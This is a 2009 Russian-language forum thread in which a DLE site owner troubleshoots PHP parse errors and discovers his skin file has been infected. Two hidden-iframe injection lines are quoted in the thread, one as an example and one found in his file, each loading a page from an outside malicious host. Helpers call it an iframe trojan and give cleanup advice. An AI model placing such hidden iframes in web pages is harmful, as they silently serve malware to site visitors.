ogirok 0 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 У меня такая проблема. Захожу к себе на сайт, по адресу newssoft.com.ua Вместо сайта вот такое сообщение: Parse error: syntax error, unexpected '<', expecting T_STRING or T_VARIABLE or '{' or '$' in /home2/softik/public_html/index.php on line 402 Пробовал зайти напрямую в админ панель, выдало вот такое сообщение: Parse error: syntax error, unexpected $end in /home2/softik/public_html/engine/skins/default.skin.php on line 889 Подскажите, что это такое и как с этим бороться. Предупреждаю, с php я не знаком. Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 А где Вы скачивали скрипт DLE? C какого сайта? Цитата Ссылка на сообщение Поделиться на других сайтах
ogirok 0 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Автор У меня лицензионый. Скачивал с сайта разработчика. http://dle-news.ru/ Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 (изменено) А почему перестало работать? Может какой-то модуль установили? Вносили изменения в движок? Изменено 27 июля 2009 пользователем WWW.ZEOS.IN Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 (изменено) попробуйте переустановить...чистый дистриб залейте... Изменено 27 июля 2009 пользователем zimka Цитата Ссылка на сообщение Поделиться на других сайтах
ogirok 0 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Автор А почему перестало работать? Может какой-то модуль установили? Вносили изменения в движек? Модули не устанавливал, движок не изменял. Редактировал только меню сайта (изменил название рубрик). Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Тогда наверное что-то хостер натворил Цитата Ссылка на сообщение Поделиться на других сайтах
ogirok 0 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Автор Тогда наверное что-то хостер натворил Почему Вы так думаете? Я думаю, что хостер скажет, что проблемы у меня. Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 (изменено) наврятли хостер http://newssoft.com.ua/engine/rss.php скорей всего что то не там редактировал)...Каким образом редактировали? и где именно? Походу были изменения в файле /engine/skins/default.skin.php Изменено 27 июля 2009 пользователем zimka Цитата Ссылка на сообщение Поделиться на других сайтах
ogirok 0 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Автор наврятли хостер http://newssoft.com.ua/engine/rss.php скорей всего что то не там редактировал)...Каким образом редактировали? и где именно? Походу были изменения в файле /engine/skins/default.skin.php Редактировал шаблон main.tpl. В котором заменил название рубрик идущие с шаблоном на свои и прописал пути к рубрикам. /engine/skins/default.skin.php я не редактировал. Ведь я написал, что в php не разбераюсь. Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 наврятли хостер http://newssoft.com.ua/engine/rss.php скорей всего что то не там редактировал)...Каким образом редактировали? и где именно? Походу были изменения в файле /engine/skins/default.skin.php Редактировал шаблон main.tpl. В котором заменил название рубрик идущие с шаблоном на свои и прописал пути к рубрикам. /engine/skins/default.skin.php я не редактировал. Ведь я написал, что в php не разбераюсь. тогда попробуй перезалей папку с шаблоном.. Цитата Ссылка на сообщение Поделиться на других сайтах
ogirok 0 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Автор Хорошо попробую. Всем спасибо за советы. Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Шаблон тут не причём Цитата Ссылка на сообщение Поделиться на других сайтах
ogirok 0 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Автор Ребята, вы можете точно сказать в чем проблема и как ее решить? Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 (изменено) 1. Перезалить все файлы движка из оригинального дистрибутива. Если не поможет то второй вариант 2. Переустановить с нуля P.S Скорей всего что то с БД Или жди ответа разработчика! Изменено 27 июля 2009 пользователем zimka Цитата Ссылка на сообщение Поделиться на других сайтах
ogirok 0 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Автор Понял, пошел решать проблему Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Перевод: Синтаксическая ошибка: стоят лишние "<" или "{" или "$" в /home2/softik/public_html/index.php on line 402 строка 402. Смотрите шаблон! Но на сколько я знаю там нет столько строк.... еще есть вариант ВИРУС посмотрите в файлах шаблона и в index.php что нить подобное (<iframe src=\"http://coolnameshop.cn/in.cgi?income23\" width=1 height=1 style=\"visibility: hidden\"></iframe>) Цитата Ссылка на сообщение Поделиться на других сайтах
ogirok 0 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Автор В файле /default.skin.php нашел вот такую строчку, это оно или нет? <body><iframe src="http://q46.ru:8080/index.php" width=119 height=100 style="visibility: hidden"></iframe> Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Удалите, это бред! Перезалейте все изменённые файлы из оригинального дистрибутива. Цитата Ссылка на сообщение Поделиться на других сайтах
ogirok 0 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 (изменено) Автор А на сервере, кроме этих еще related_16.tmp, related_19.tmp, related_32.tmp, related_33.tmp и tagscloud_default.tmp Эти файлы удалять? Изменено 27 июля 2009 пользователем ogirok Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 А на сервере, кроме этих еще related_16.tmp, related_19.tmp, related_32.tmp, related_33.tmp и tagscloud_default.tmp Эти файлы удалять?Это кэш, удалять или нет, это уже решайте сами Проблему выше получилось решить? Цитата Ссылка на сообщение Поделиться на других сайтах
ogirok 0 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 (изменено) Автор Проблема решена, спасибо. А как эта гадость ко мне попала. Могли через комментарий запустить? Изменено 27 июля 2009 пользователем ogirok Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 Способов много. Точно сказать нельзя В 80% случаев виновен Администратор сайта Цитата Ссылка на сообщение Поделиться на других сайтах
webturist 6 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 (изменено) В файле /default.skin.php нашел вот такую строчку, это оно или нет? <body><iframe src="http://q46.ru:8080/index.php" width=119 height=100 style="visibility: hidden"></iframe> Это iframe троян. А как эта гадость ко мне попала. Могли через комментарий запустить? Нет. Решение здесь: http://forum.dle-news.ru/index.php?showtop...st&p=219427 + Не используйте крякнутый FTP-менеджер. + Защитите админку с помощью .htaccess Изменено 27 июля 2009 пользователем webturist Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 27 июля 2009 Рассказать Опубликовано: 27 июля 2009 + Защитите админку с помощью .htaccessВсмысле? 0_O Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.